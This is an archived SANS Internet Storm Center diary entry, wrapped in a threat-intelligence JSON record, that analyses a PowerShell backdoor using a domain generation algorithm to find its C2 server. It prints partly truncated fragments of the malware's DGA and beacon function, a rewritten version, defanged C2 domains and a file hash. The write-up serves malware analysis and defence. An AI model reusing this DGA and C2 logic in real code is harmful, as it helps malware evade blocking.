{ "id": "bdeed0e8-fcda-4cd3-b80f-ca7624cfc84d", "created_at": "2026-04-06T00:22:33.153169Z", "updated_at": "2026-04-10T13:11:35.712664Z", "deleted_at": null, "sha1_hash": "63fe1710305b852170a52788272667e72a8e3834", "title": "Powershell Backdoor with DGA Capability - SANS ISC", "llm_title": "", "authors": "", "file_creation_date": "0001-01-01T00:00:00Z", "file_modification_date": "0001-01-01T00:00:00Z", "file_size": 44038, "plain_text": "Powershell Backdoor with DGA Capability - SANS ISC\r\nBy SANS Internet Storm Center\r\nArchived: 2026-04-05 20:55:26 UTC\r\nDGA (“Domain Generation Algorithm\") is a popular tactic used by malware to make connections with their C2\r\nmore stealthy and difficult to block. The idea is to generate domain names periodically and use them during the\r\ndefined period. An alternative is to generate a lot of domains and loop across them to find an available C2 server.\r\nAttackers just register a few domain names and can change them very quickly.\r\nI found a simple malicious PowerShell script that implements a backdoor. The initial script\r\n(SHA256:74a441ef34775d4cdec676e06a669fa0594a8455a1d31f9d2a52e6ae5bc3aaba)[1] had a VT score of only\r\n2/60. It contains the second stage, Base64-encoded. Once registered to the C2 server, it enters a loop and waits for\r\ncommands from the C2.\r\nHere is how DGA is implemented:\r\nfunction zdiffvahs( $yyfhghws ){\r\n $jwusghd = \"hxxp://kama[.]mialeeka[.]com/\";\r\n \"hee\",\"xu1\",\"hs0\",\"jd5\",\"mqf\" | %{ $jwusghd += \",\"+\"http://\"+ ( [Convert]::ToBase64String( [System\r\n $jwusghd.split(\",\") | %{\r\n if( !$myurlpost ){\r\n $myurlpost = $_;\r\n if( !(sendpost2 ($yyfhghws + \"\u0026domen=$myurlpost\" )) ){ $myurlpost = $false; };\r\n Start-Sleep -s 5;\r\n }\r\n };\r\n if( $yyfhghws -match \"status=register\" ){\r\n return \"ok\";\r\n }else{\r\n return $myurlpost;\r\n }\r\n};\r\nThere is a first C2 address in clear text (kama[.]mialeeka[.]com), but others are created, and a comma-separated\r\nlist is created. I made a clean version of this function:\r\nfunction dgagen(){\r\n $domain = \"hxxp://kama[.]mialeeka[.]com/\";\r\n \"hee\",\"xu1\",\"hs0\",\"jd5\",\"mqf\" | %{ $domain += \",\"+\"hxxp://\"+ ( [Convert]::ToBase64String( [System.T\r\n $domain.split(\",\") | %{\r\n echo $_;\r\nhttps://isc.sans.edu/diary/Powershell+Backdoor+with+DGA+Capability/29122\r\nPage 1 of 2\n\n};\r\n};\r\nThe generated list is:\r\nPS C:\\Users\\xavier\u003e dgagen\r\nhxxp://kama[.]mialeeka[.]com/\r\nhxxp://agvlmjixmdqx.top/\r\nhxxp://ehuxmjixmdqx.top/\r\nhxxp://ahmwmjixmdqx.top/\r\nhxxp://amq1mjixmdqx.top/\r\nhxxp://bxfmmjixmdqx.top/\r\nDomains are generated by concatenating a small string with the current date (“%y%m%V” returns the current\r\nyear, month, and week number). The string is Base64 encoded, and a common TLD (“.top”) is added. The script\r\ntries to contact them in a loop until a valid server is found.\r\nAt this time, the initial domain points to a Google Cloud. I checked the other domains against whois.nic.top, but\r\nthey're not registered yet.\r\n[1] https://www.virustotal.com/gui/file/74a441ef34775d4cdec676e06a669fa0594a8455a1d31f9d2a52e6ae5bc3aaba\r\nXavier Mertens (@xme)\r\nXameco\r\nSenior ISC Handler - Freelance Cyber Security Consultant\r\nPGP Key\r\nSource: https://isc.sans.edu/diary/Powershell+Backdoor+with+DGA+Capability/29122\r\nhttps://isc.sans.edu/diary/Powershell+Backdoor+with+DGA+Capability/29122\r\nPage 2 of 2", "extraction_quality": 1, "language": "EN", "sources": [ "Malpedia" ], "origins": [ "web" ], "references": [ "https://isc.sans.edu/diary/Powershell+Backdoor+with+DGA+Capability/29122" ], "report_names": [ "29122" ], "threat_actors": [], "ts_created_at": 1775434953, "ts_updated_at": 1775826695, "ts_creation_date": 0, "ts_modification_date": 0, "files": { "pdf": "https://archive.orkl.eu/63fe1710305b852170a52788272667e72a8e3834.pdf", "text": "https://archive.orkl.eu/63fe1710305b852170a52788272667e72a8e3834.txt", "img": "https://archive.orkl.eu/63fe1710305b852170a52788272667e72a8e3834.jpg" } }